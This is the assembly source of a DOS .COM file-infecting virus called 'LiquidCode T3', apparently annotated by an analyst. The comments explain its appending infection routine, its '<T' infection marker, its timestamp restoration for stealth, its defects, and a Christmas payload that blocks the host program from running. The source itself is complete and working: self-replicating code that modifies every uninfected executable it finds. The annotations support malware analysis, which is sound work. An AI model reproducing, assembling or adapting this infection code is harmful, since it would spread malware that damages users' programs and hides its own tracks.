;LiquidCode --- T3
;
; Virus
;
;This version:
;
;Searches the current directory for COM files that are not yet infected;
;every one it finds is infected (the search loop only stops when DOS
;find-next fails or a DOS call errors out).
;
;This virus has a routine which self-destructs itself and uninfects
;the file.  In this build that routine (self_kill) is unreachable: the
;command-line check that would jump to it is commented out below.
;
; --------------------------------------------------------------------------
; Analyst notes (sample left byte-identical; only comments were added)
;
; Syntax: MASM/TASM (assume, segment, proc/endp, offset, dup, '=' equates),
; not NASM as the corpus label claims.  Target: DOS .COM on a 286 or later
; (pusha/popa and `push imm16` need the .286 directive).
;
; Type: non-resident, direct-action, appending .COM infector.
;   - Infected host: original bytes 0..4 replaced by
;         E9 lo hi '<' 'T'   (jmp to the appended body + two marker bytes)
;     and the whole virus image (vsize bytes, code AND data) appended at EOF.
;   - Infection marker: file bytes 3..4 == "<T" (compared against mrk).
;   - Strings in the image: "*.COM", "<T3> ", "<tm>LiquidCode 92".
;   - Payload: on 25 December the host is not run (plain int 20h).  An
;     April-1st payload (delete the running file) is commented out.
;
; Defects / behaviour worth knowing when analysing an incident:
;   - A file that already carries the marker is never closed (no
;     int 21h/3Eh on that path): one DOS handle leaks per infected file
;     found, so once the handle table is full open_file fails and the run
;     ends early via term_virus.
;   - None of the write calls in INFECT are checked; a disk-full condition
;     leaves a truncated image appended to the host.
;   - The size test in go_again looks only at the low 16 bits of the DTA
;     size and has no upper bound, so a .COM near 64K is damaged, not
;     skipped.
;   - The DTA is moved into the virus body and never restored before the
;     host runs.
;   - A read-only or locked .COM aborts the whole run (open_file ->
;     term_virus) instead of being skipped.
;   - The data area (saved header bytes, DTA, handle) is inside the image
;     that is written out, so copies on disk differ slightly in their
;     data bytes; the code bytes are constant.
; --------------------------------------------------------------------------

assume cs:code
.286
code segment "code"
org 0100h
start proc
        jmp v_start             ; 5-byte header: E9 disp16 + 2 pad bytes.
        nop                     ; On a victim these 5 bytes become nw_5/mrk
        nop                     ; (see INFECT); the originals are kept in
                                ; _fstfive.
v_start:
        call $+3                ; push the address of the next instruction
        pop dx                  ; dx = run-time address of v_start + 3
        sub dx, 3               ; dx = run-time address of v_start
        push dx                 ; bp = relocation base; every data item is
        pop bp                  ; addressed as bp + (offset item - 0105h),
        mov si, dx              ; so the body works wherever it was appended
;
; Replace the first 5 bytes in memory with the original host bytes saved
; in _fstfive, so that term_virus can later fall into the host at 0100h.
; (First generation: _fstfive is CD 20 90 90 90, i.e. the clean build
; just terminates when it "runs the host".)  ds = es = cs in a .COM.
        add si, first_five
        mov di, 0100h
        mov cx, 5
        lodsb
        stosb
        loop $-2                ; $-2 = the lodsb above
;see if the user wants to disinfect this file - disabled in this build,
;which is why self_kill below is dead code:
; mov si, 82h                   ; command-line tail in the PSP
; lodsb
; cmp al, "[" ;is al the code to disinfect? "["
; jne ok_dont_disinfect
; jmp self_kill
ok_dont_disinfect:
;date check that decides whether a payload runs
        mov ah, 2ah             ; int 21h/2Ah: get system date
        int 21h
;cx year 1980-2099
;dh month 1-12
;dl day
;al day of week 0=Sun .. 6=Sat (the original comment said 7=Sat)
        cmp dh, 12
        jne notdec
        cmp dl, 25
        jne notdec
        jmp christmas           ; 25 December: exit without running the host
notdec:
        cmp dh, 4
        jne notapril
        cmp dl, 1
        jne notapril
; jmp aprilfools                ; 1 April payload is disabled
notapril:

;Point the DTA at the buffer inside the virus body (never restored).
        call set_dta
;find the first *.COM in the current directory; none -> term_virus
        call find_first_file
go_again:
; One candidate per pass.  ax = low word of the file size from the DTA.
        mov si, bp
        add si, size_
        lodsw
        cmp ax, 5               ; NOTE(review): only the low 16 bits, and no
        ja gd4                  ; upper bound check - see header notes
        jmp resrch
gd4:
        call open_file          ; ax = handle (also stored in handl)
        mov bx, ax
        mov al, 0               ; al=0: save the file's date/time so the
        call date_time          ; timestamp can be put back after infection
        mov ah, 3fh             ; read the victim's first 5 bytes into
        mov cx, 5               ; _fstfive (they travel inside the image
        mov dx, bp              ; written to the victim, and ckmrk = bytes
        add dx, first_five      ; 3..4 of them is the marker test below)
        int 21h
;**** mov ax, 4202h            ; (leftover comment in the original)
        mov cx, 0
        mov ax, 4202h           ; seek to EOF: ax = low word of the size,
        mov dx, cx              ; and the file pointer is now where the
        int 21h                 ; body will be appended
        sub ax, 3               ; jmp at 0100h is 3 bytes long, so the
        mov si, bp              ; displacement to the body at offset
        add si, new_5           ; 0100h+size is size-3
        mov [si+1], ax          ; patch it into the E9 xx xx in nw_5
        mov si, bp
        mov di, si
        add si, chkmark         ; bytes 3..4 just read from the file
        add di, mark            ; "<T" (first two bytes of mrk)
        mov cx, 2
        repe cmpsb
        jne INFECT              ; marker absent -> infect
;File found was previously infected - search for a new one.
; NOTE(review): the handle from open_file is NOT closed on this path
; (see header notes: one handle leaks per already-infected file).
        jmp resrch

wipe_name:
; Zero the 13-byte filename field of the DTA.  Preserves di, ax, cx;
; needs es = cs.  Called before every write of the image and before each
; find-next, presumably so the victim's name does not end up in the copy
; written to disk (find-next itself does not use the name field).
        push di
        push ax
        push cx
        mov di, bp
        add di, name_
        mov cx, 13
        mov al, 0
        rep stosb
        pop cx
        pop ax
        pop di
        ret
resrch:
; Next directory entry; when find-next fails, hand control to the host.
        call wipe_name
        mov ah, 4fh             ; int 21h/4Fh: find next (uses the DTA)
        int 21h
        jnc gd3
        jmp term_virus
gd3:
        jmp go_again
INFECT:
;Time to infect the file: append the image, then overwrite the header.
; None of the int 21h results below are checked.
        mov si, bp
        add si, handle
        mov bx, [si]            ; bx = handle of the open victim
        mov cx, vsize           ; bytes from v_start to end___
        mov dx, bp              ; ds:dx = v_start (the live image, data included)
        call wipe_name
        mov ax, 4000h           ; write image at EOF (pointer left there by gd4)
        int 21h
        mov ax, 4200h           ; seek to offset 0
        mov cx, 0
        mov dx, cx
        int 21h
        mov dx, bp
        add dx, new_5           ; E9 lo hi '<' 'T' (nw_5 runs into mrk)
        mov ax, 4000h
        mov cx, 5
        int 21h
        mov al, 1               ; al=1: restore the saved date/time so the
        call date_time          ; timestamp does not betray the change
        mov ax, 3e00h           ; close
        int 21h
        jmp resrch

fndnam proc
; Locate the running program's own full pathname.  DOS (3.0 and later, by
; convention) stores it after the environment strings:
;     <string>00 <string>00 ... 00  <word>  <pathname>00
; In:  ds = PSP (= cs for a .COM).
; Out: ds = es = environment segment, dx = offset of the pathname in it
;      (ready for int 21h/3Dh).  si/di/ax/al clobbered.
; The lodsb/stosb pairs write each byte back where it came from; their only
; effect is to keep di one byte behind si so that di lands on the first
; letter of the pathname.
        mov si, env             ; PSP:2Ch = environment segment
        mov ax, [si]
        mov es, ax
        mov ds, ax
        mov si, 0
        mov di, si
__lp:
        lodsb
        cmp al, 0               ; end of one environment string?
        je chknxt
        stosb
        jmp __lp
chknxt:
        stosb
        lodsb
        cmp al, 0               ; second NUL in a row = end of environment
        je fnd1
        stosb
        jmp __lp
fnd1:
        stosb
__lp2:
; Skip the count word; stop at the first letter (the drive letter).
        lodsb
        cmp al, "a"
        jae ff_
up2:
        cmp al, "A"
        jae fff_
up3:
        stosb
        jmp __lp2
ff_:
        cmp al,"z"
        jbe fnd
        jmp up2
fff_:
        cmp al, "Z"
        jbe fnd
        jmp up3
fnd:
        mov si, di              ; di was not advanced past the letter:
        mov al, 0               ; it points at the start of the pathname
        repne scasb             ; NOTE(review): cx is never loaded before this,
                                ; so the scan is effectively a no-op and its
                                ; result (di) is overwritten two lines down
        mov dx, si
        mov di, dx
        ret
env equ 2ch                     ; PSP offset of the environment-segment word
fndnam endp


self_kill:
;Disinfect the running program on disk: put the original first 5 bytes
;back and cut the appended body off.  Dead code in this build - its only
;caller is the commented-out "[" check near the top.  (The original comment
;said "SI points to the name"; in fact fndnam locates the name itself.)
;Any DOS error here exits via abrt without running the host.
        call fndnam             ; ds = env segment, dx -> own pathname
        jmp gd__
abrt:
        int 20h                 ; give up: terminate (cs = PSP)
gd__:
        mov ax, 3d02h           ; open own file read/write
        int 21h
        jc abrt
        mov bx, ax
        mov ax, cs              ; back to ds = es = cs for the buffers below
        mov ds, ax
        mov es, ax
        mov cx, 5
        mov dx, bp
        add dx, first_five      ; original header bytes carried in the image
        call wipe_name
        mov ax, 4000h           ; write them at offset 0 (pointer is 0 after open)
        int 21h
        jc abrt
        mov dx, 0
        mov cx, 0
        mov ax, 4202h           ; seek to EOF: ax = low word of the size
        int 21h
        jnc gd__1
        jmp abrt
gd__1:
        sub ax, vsize           ; original length = size - image length
        mov dx, ax
        mov cx, 0
        mov ax, 4200h           ; seek there (assumes size fits in 16 bits)
        int 21h
        call wipe_name
        mov cx, 0
        mov ax, 4000h           ; write of 0 bytes = truncate at the pointer
        int 21h
        mov ax, 3e00h           ; close (result unchecked)
        int 21h
        jmp term_virus
date_time:
; Save (al=0) or restore (al=1) the open file's date/time via int 21h/57h.
; In: bx = file handle, al = 0 to read into tme/dt_, else write from them.
; All registers preserved (pusha/popa).
        pusha
        mov ah, 57h
        cmp al, 0
        je fnd__$
        mov di, bp              ; al<>0: set from the saved values
        mov si, di
        add di, date
        add si, time
        mov dx, [di]
        mov cx, [si]
        int 21h                 ; ax = 5701h: set date/time
        jmp ret__
fnd__$:
        int 21h                 ; ax = 5700h: cx = time, dx = date
        mov si, bp
        mov di, bp
        add si, time
        add di, date
        mov [si], cx
        mov [di], dx
ret__:
        popa
        ret
open_file:
; Open the file named in the DTA (n_me) read/write.  Out: ax = handle,
; also stored in handl.  Any failure (read-only file, no free handle)
; ends the whole run via term_virus rather than skipping the file.
        mov dx, bp
        add dx, name_
        mov ax, 3d02h
        int 21h
        jnc gd2
        jmp term_virus
gd2:
        mov si, bp
        add si, handle
        mov [si], ax
        ret
find_first_file:
; int 21h/4Eh on "*.COM", normal attributes only (cx = 0); hidden,
; system and read-only files are not enumerated.  None found -> term_virus.
        mov dx, bp
        mov cx, 0
        mov ah, 4eh
        add dx, all_com_files
        int 21h
        jnc gd1
        jmp term_virus
gd1:
        ret
set_dta:
; int 21h/1Ah: point the DTA at d_t_a inside the virus body.
        mov dx, bp
        mov ah, 1ah
        add dx, dta
        int 21h
        ret
term_virus:
; Hand control to the host: clear the general registers to something
; resembling a fresh .COM entry state (approximate; ax/di/bp values are
; what the author chose, not what DOS guarantees) and jump to 0100h,
; where the original 5 bytes were restored at start-up.
        mov ax, 0
        mov bx, ax
        mov cx, bx
        mov dx, cx
        mov si, 0100h
        mov di, -1
        mov bp, di
        push 0100h              ; needs .286 (push imm16)
        ret                     ; = jmp 0100h

CHRISTMAS:
;25 December payload.  Not a lockup as the original comment said:
; the process simply terminates without running the host program.
        int 20h
;APRILFOOLS:                    ; disabled 1 April payload:
;Ha Ha delete current file       ; int 21h/41h on the running program's own
; call fndnam                    ; pathname (from fndnam), then run the host
; mov ah, 41h
; int 21h
; mov ax, cs
; mov ds, ax
; mov es, ax
; jmp term_virus
; Data Bank - lies inside the appended image (vsize covers it), so it is
; copied to every victim together with the code.
_fstfive:                       ; victim's original bytes 0..4: read from the
        int 20h                 ; file in gd4, written back by self_kill.
        nop                     ; First generation: CD 20 90 90 90, so the
ckmrk:                          ; clean build merely exits when it "runs" its host.
        nop                     ; ckmrk = bytes 3..4 of _fstfive; after the
        nop                     ; 5-byte read they are the marker under test.
acf db "*.COM",0                ; find-first pattern
dt_ dw 0                        ; victim's file date (int 21h/57h)
tme dw 0                        ; victim's file time
d_t_a:                          ; DOS find-first/find-next DTA, field by field:
rfd db 21 dup (0)               ;   +00h reserved (find-next state)
att db 0                        ;   +15h attribute
dw 0                            ;   +16h time
dw 0                            ;   +18h date
sz dd 0                         ;   +1Ah size (only the low word is tested)
n_me db 13 dup (0),0            ;   +1Eh ASCIIZ name (+1 spare byte)
handl dw 0                      ; handle of the file currently open
nw_5 db 0e9h,0,0                ; new header: E9 disp16 (patched in gd4) ...
mrk db "<T3> "                  ; ... immediately followed by the marker, so
                                ; the 5-byte write of nw_5 emits E9 lo hi '<' 'T'
strain db "<tm>LiquidCode 92"   ; author tag (never referenced by code)
;
end___:                         ; end of the appended image
; Offsets relative to v_start, which assembles at 0105h (org 100h + the
; 5-byte header).  Add bp (run-time address of v_start) to reach each item.
first_five = offset _fstfive-0105h
all_com_files = offset acf-0105h
dta = offset d_t_a-0105h
attribute = offset att-0105h    ; defined but unused
time = offset tme-0105h
date = offset dt_-0105h
size_ = offset sz-0105h
name_ = offset n_me-0105h
handle = offset handl-0105h
new_5 = offset nw_5-0105h
mark = offset mrk-0105h
chkmark = offset ckmrk-0105h
vsize = offset end___-0105h     ; length of the image written to victims
start endp
code ends
end start

; Trailer after END (ignored by the assembler): BBS advertisement.  The
; decorative CP437 box-drawing characters were lost in transcoding and are
; rendered here as '='.
; ====================================================================
; ===================> and Remember Don't Forget to Call <============
; ===========> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <=====
; ====================================================================